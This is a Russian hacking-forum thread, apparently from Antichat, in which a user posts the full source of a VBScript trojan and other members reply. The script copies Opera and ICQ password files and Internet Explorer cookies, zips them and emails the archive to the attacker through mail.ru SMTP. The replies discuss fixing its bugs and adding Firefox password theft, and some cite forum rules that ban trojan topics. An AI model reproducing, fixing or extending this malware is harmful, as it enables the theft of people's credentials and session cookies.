Простой троян на vbs

скрипт на vbs для кражи паролей

В написание трояна мне помогла статья "Pashkela" вот она , за что ему большое спасибо .
Трой тырит пароли от: Opera , icq6 ,icq6.5 и куки от IE и высылает отчёт на мыло . Думаю с настройкой проблем не будет , если асеку включена то пароль от асеку непридёт . Сейчас продолжаю писать трояна до более лучшей версии , следующий трой будет тырить по более паролей .

Code:

Const FOF_SIMPLEPROGRESS = 256 
Dim MySource, MyTarget, MyHex, MyBinary, i 
Dim oShell, oCTF 
Dim oFileSys 
dim winShell 
dim newfolderpath
dim t
On Error Resume Next
'Создаем временную папку для записи нужных нам результатов (лучше, если название будет УНИКАЛЬНОЕ, чтобы не было конфликтов)
'==========================================================
h = Hour(Now)
m = Minute(Now)
s = Second(Now)
t = date() & "-" & h & "-" & m & "-" & s
dim filesys, newfolder 
newfolderpath = "c:\12345" ' Название временной папки
set filesys=CreateObject("Scripting.FileSystemObject") 
If Not filesys.FolderExists(newfolderpath) Then 
   Set newfolder = filesys.CreateFolder(newfolderpath) 
End If
set filesys=Nothing
Set newfolder=Nothing
'============================================
'тырим пароли от Оперы и icq 6 и icq6.5 , если асеку включена нехера непридёт
Set FileSystemObject = CreateObject("scripting.filesystemobject") 
set WshShell1 = WScript.CreateObject("WScript.Shell")
str = "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\Opera\Opera\profile\wand.dat" 
If FileSystemObject.fileExists(str) = True Then 
FileSystemObject.copyfile "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\Opera\Opera\profile\wand.dat" ,"C:\12345\wand.dat" 
FileSystemObject.copyfile "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\ICQ\здесь icq который хотм стырить\Owner.mdb" ,"C:\12345\Owner.mdb"
Else  
End If
'============================================
' Тырим куки IE
Const ForReading = 1, ForWriting = 2, ForAppending = 8 
Dim MyZipName 
Dim oApp, oFolder, oFile 
set WshShell1 = WScript.CreateObject("WScript.Shell") 
filePath = "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Cookies" 'Тут указываем, то что архивируем.
set WshShell1 = Nothing
MySource = filePath
MyTarget = newfolderpath & "\" & t & "-" & "ie_cookie.zip"
archPath_IE = t & "-" & "ie_cookie.zip"
MyHex = Array(80, 75, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) 
For i = 0 To UBound(MyHex) 
MyBinary = MyBinary & Chr(MyHex(i)) 
Next 
Set oShell = CreateObject("WScript.Shell") 
Set oFileSys = CreateObject("Scripting.FileSystemObject") 
Set oCTF = oFileSys.CreateTextFile(MyTarget, True) 
oCTF.Write MyBinary 
oCTF.Close 
Set oCTF = Nothing 
Set oApp = CreateObject("Shell.Application") 
Set oFolder = oApp.NameSpace(MySource) 
If Not oFolder Is Nothing Then 
oApp.NameSpace(MyTarget).CopyHere oFolder.Items 
End If 
wScript.Sleep(5000) 
Set oFile = Nothing 
On Error Resume Next 
Do While (oFile Is Nothing) 
Set oFile = oFileSys.OpenTextFile(MyTarget, ForAppending, False) 
If Err.number <> 0 then 
Err.Clear 
wScript.Sleep 3000 
End If 
Loop 
Set oFile=Nothing 
Set oFileSys=Nothing
'============================================ 
'скрипт который архивирует папку 12345 с пасами
Dim arrResult
arrResult = ZipFolder( "C:\12345", "C:\12345.zip" )
If arrResult(0) <> 0 Then
    WScript.Echo "ERROR " & Join( arrResult, vbCrLf )
End If
Function ZipFolder( myFolder, myZipFile )
    Dim objApp, objFSO, objTxt
    Const ForWriting = 2
    If Right( myFolder, 1 ) <> "\" Then
        myFolder = my Folder & "\"
    End If
    On Error Resume Next
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Set objTxt = objFSO.OpenTextFile( myZipFile, ForWriting, True )
    objTxt.Write "PK" & Chr(5) & Chr(6) & String( 18, Chr(0) )
    objTxt.Close
    Set objTxt = Nothing
    Set objFSO = Nothing
    If Err Then
        ZipFolder = Array( Err.Number, Err.Source, Err.Description )
        Err.Clear
        On Error Goto 0
        Exit Function
    End If
    Set objApp = CreateObject( "Shell.Application" )
    objApp.NameSpace( myZipFile ).CopyHere objApp.NameSpace( myFolder ).Items
    If Err Then
        ZipFolder = Array( Err.Number, Err.Source, Err.Description )
        Set objApp = Nothing
        Err.Clear
        On Error Goto 0
        Exit Function
    End If
    Do Until objApp.NameSpace( myZipFile ).Items.Count _
           = objApp.NameSpace( myFolder  ).Items.Count
        WScript.Sleep 200
    Loop
    Set objApp = Nothing
    If Err Then
        ZipFolder = Array( Err.Number, Err.Source, Err.Description )
        Err.Clear
        On Error Goto 0
        Exit Function
    End If
    On Error Goto 0
    ZipFolder = Array( 0, "", "" )
End Function
'==============================================
'отправка на мыло
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","[COLOR=Red]куды придёт отчёт[/COLOR]@mail.ru","[COLOR=Red]левое мыло@mail.ru[/COLOR]","passi_lamera","hacked_by_hack-win32")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин левого мыла без "@mail.ru""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="[COLOR=Red]пароль левого мыла[/COLOR]"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="[COLOR=Red]smtp.mail.ru[/COLOR]"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "C:\ 12345.zip"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing

в коде несколько умышленных ошибок , а точнее кое где допущены пробелы .

 

<...>filePath = "C:\Documents and Settings\" <...>

уверен?

 

я пока новичок в vbs , у меня всё работало , если неправельно , поправь

 

Строка 125 символ 62 предполагается наличие ')'

 

еще добавь чтоб от фаерфокса пи*дил

 

ага , пишу следующий cкрипт , он будет по более тырить

 

прочти правила форума, переименуй тему и добавь защиту от скрипт-киддисов
как минимум

>тыц<

 

+ filePath = "C:\Documents and Settings\" - очень нехорошо

 

smtp.mail.ru что вмсесто этого писать?

 

это не надо заменять , если мыло на маил

 

ясн а де пробелы добавлять?)

 

hack-win32, твоя тема, возможно, несколько противоречит ПРАВИЛАМ ФОРУМА:

ВНИМАНИЕ!
На форуме Античата запрещена тематика пинчей, отчетов, троянов и крипторов! Такие темы будут сразу удаляться без предупреждения!

Правила форума Античат, см. после п. 16.

 

Он за то что ДокументСетингс и другие системные катологи не обязательно будет на диске "C"

с одной стороны ты прав а с другой он - типо он не продает и не распространяет а выставил на суд пользователей свою работу. хотя это решать Админам и Модерам

 

читал я все правила , сначало создал тему потом прочёл правила , затем редактировал на "скрипт на вбс для кражи паролей" допустил пару пробелов в коде , а вот немогу само название темы изменить

 

я поместил тему в "наши статьи" и кто-то переместил её сюда

 

а разве вы не занимаетесь тем же,только не разглашая етого?